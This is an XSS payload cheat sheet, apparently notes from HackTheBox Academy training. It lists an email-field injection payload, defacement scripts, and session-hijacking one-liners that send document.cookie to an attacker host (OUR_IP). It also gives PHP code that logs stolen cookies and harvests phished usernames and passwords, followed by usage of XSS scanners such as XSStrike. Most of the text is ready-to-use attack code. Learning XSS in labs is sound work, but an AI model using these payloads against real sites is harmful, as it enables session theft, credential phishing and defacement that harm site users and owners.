Payloads Tips and Tricks

List of useful payloads, tips and tricks about XSS gathered with time

To be tried and inserted in email fields

"<img/src/onerror=alert(0)"@xss.com

Payloads List

GitHub - payloadbox/xss-payload-list: 🎯 Cross Site Scripting ( XSS ) Vulnerability Payload ListGitHub

XSS-Payload-List

PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

PayloadAllTheThings

Defacing

Attacker can take advantage of stored XSS to change the look of the web application and cause damages to the company facing website. Attackers may deface a website to prove the compromise on the target. Website defacement can cause important impacts on a company business and affairs.

# Change page title
<script>document.title = 'HackTheBox Academy'</script>

# Change Background
<script>document.body.style.background = "#141d2b"</script>
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

# Change page text
document.getElementById("todo").innerHTML = "New Text"
document.getElementsByTagName('body')[0].innerHTML = "New Text"

Session hijacking payloads

These payloads can be writted in a script.js file hosted on the attacker web server.

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

PHP payloads for session hijacking

This payload writes down the victim cookies along with the associated IP into a file. This payload can be saved in a index.php file that is hosted on the attacker web server.

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

PHP payloads to steal credentials

This payload looks for the username and password parameters in the URL and if exists it will write the username and password entered by the victim in a file named creds.txt. Then, it will redirect the user to a legitimate page.

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://10.129.142.127/phishing/index.php");
    fclose($file);
    exit();
}
?>PHP

Tools

Automated XSS tools

GitHub - s0md3v/XSStrike: Most advanced XSS scanner.GitHub

XSStrike

git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python xsstrike.py -u "http://URL.com/?q=query"

GitHub - rajeshmajumdar/BruteXSS: BruteXSS is a tool written in python simply to find XSS vulnerabilities in web application. This tool was originally developed by Shawar Khan in CLI. I just redesigned it and made it GUI for more convienience.GitHub

BruteXSS

GitHub - epsylon/xsser: Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.GitHub

XSSER